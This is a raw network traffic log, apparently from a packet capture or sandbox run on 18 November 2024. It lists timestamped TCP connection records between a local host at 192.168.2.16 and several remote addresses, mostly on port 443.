                                                                                                                                                                                            Nov 18, 2024 21:00:28.018170118 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.018285036 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.018448114 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.018662930 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.018687963 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.648041010 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.648382902 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.648446083 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.649687052 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.649774075 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.652185917 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.652249098 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.652390957 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.652533054 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.652545929 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.652576923 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.703434944 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.703496933 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.751398087 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.803102970 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.803679943 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:28.803719997 CET44349872216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:28.803776979 CET49872443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:29.598531961 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                            Nov 18, 2024 21:00:31.009911060 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.010008097 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.010143995 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.010597944 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.010632992 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.013606071 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.013643026 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.013726950 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.014286041 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.014300108 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.877590895 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.877917051 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.877942085 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.878952980 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.879017115 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.879492998 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.879551888 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.879770041 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.879777908 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.892956018 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.893202066 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.893225908 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.894825935 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.894896984 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.895423889 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.895502090 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.895750999 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:31.895759106 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:31.928411961 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:31.940967083 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:32.152853966 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.169795990 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.169925928 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.170001030 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:32.170022011 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.170056105 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.170113087 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:32.170147896 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.199419975 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:32.199440002 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.199964046 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:32.200056076 CET44349874142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.200126886 CET49874443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:32.215435982 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:32.215502977 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.215816021 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:32.216111898 CET44349873142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.216200113 CET49873443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:32.219361067 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:32.219407082 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.219513893 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:32.220109940 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:32.220148087 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.220673084 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:32.220741987 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:32.220838070 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:32.221060991 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:32.221093893 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.083430052 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.083724976 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.083784103 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.084780931 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.084861994 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.085143089 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.085208893 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.085289955 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.085305929 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.092971087 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.093257904 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.093283892 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.094724894 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.094810963 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.095041037 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.095133066 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.095160961 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.095205069 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.125425100 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.141396999 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.141421080 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.189445019 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352611065 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352664948 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352757931 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352777958 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352791071 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352844000 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.352884054 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.354703903 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.397430897 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.397475004 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.397490978 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.397500992 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.397888899 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.397975922 CET44349876142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.398102045 CET49876443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:33.398283958 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.398371935 CET44349877142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.398427010 CET49877443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:33.401974916 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:33.402018070 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:33.402096987 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:33.402352095 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:33.402371883 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.085397005 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                            Nov 18, 2024 21:00:34.259648085 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.259984016 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.260011911 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.263163090 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.263267040 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.264671087 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.264754057 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.264995098 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.265006065 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.308707952 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.528531075 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.579443932 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.579504967 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.579988003 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:34.580147028 CET44349878142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:34.580229998 CET49878443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:36.031338930 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.031430006 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.031577110 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.031860113 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.031900883 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.654320955 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.654628038 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.654680967 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.655062914 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.655148983 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.655678034 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.655741930 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.655896902 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.655965090 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.656050920 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.656066895 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.697412014 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.799962044 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.800434113 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:36.800539970 CET44349879216.239.34.181192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:36.800612926 CET49879443192.168.2.16216.239.34.181
                                                                                                                                                                                            Nov 18, 2024 21:00:39.024697065 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:39.024736881 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:39.024871111 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:39.036268950 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:39.036294937 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:39.041508913 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:39.041567087 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:39.041663885 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:39.041842937 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:39.041857958 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.727832079 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.728539944 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:40.728606939 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.729839087 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.729927063 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:40.730326891 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:40.730391979 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.730691910 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:40.730716944 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.735564947 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.735835075 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:40.735866070 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.739581108 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.739669085 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:40.740009069 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:40.740150928 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:40.740158081 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.740214109 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.778449059 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:40.778469086 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.794393063 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:40.794411898 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:40.826412916 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:40.842413902 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:40.999557018 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.009108067 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.009164095 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.009197950 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.009263992 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:41.009294033 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.009335995 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:41.010544062 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.047422886 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:41.047456026 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.047815084 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:41.047905922 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.048141956 CET44349881142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.048197985 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:41.048216105 CET49881443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:41.062421083 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:41.062455893 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.068742037 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:41.068928003 CET44349880142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.069006920 CET49880443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:41.071737051 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:41.071783066 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.071868896 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072237968 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072324991 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072439909 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072597980 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072609901 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072782993 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:41.072817087 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.494654894 CET804970066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.494757891 CET4970080192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:42.496131897 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.496608973 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.496676922 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.497744083 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.497837067 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.498261929 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.498353958 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.498475075 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.498495102 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.501065969 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.501301050 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.501362085 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.504400969 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.504463911 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.504797935 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.504887104 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.504915953 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.542531967 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.547358036 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.557430983 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.557451963 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.605436087 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.760549068 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.777827024 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.777949095 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.778037071 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.778047085 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.778110981 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.778146982 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.778177977 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.813442945 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.813504934 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.813833952 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.813889980 CET44349884142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.813955069 CET49884443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:42.816200972 CET4970080192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:42.816515923 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:42.816539049 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.816625118 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:42.816833973 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:42.816845894 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.821561098 CET804970066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.829510927 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.829519033 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.829791069 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:42.829863071 CET44349883142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:42.829931021 CET49883443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:43.673759937 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:43.674082994 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:43.674107075 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:43.675082922 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:43.675159931 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:43.675455093 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:43.675523043 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:43.675623894 CET49885443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:43.675631046 CET44349885142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:43.723468065 CET49885443192.168.2.16142.250.186.132
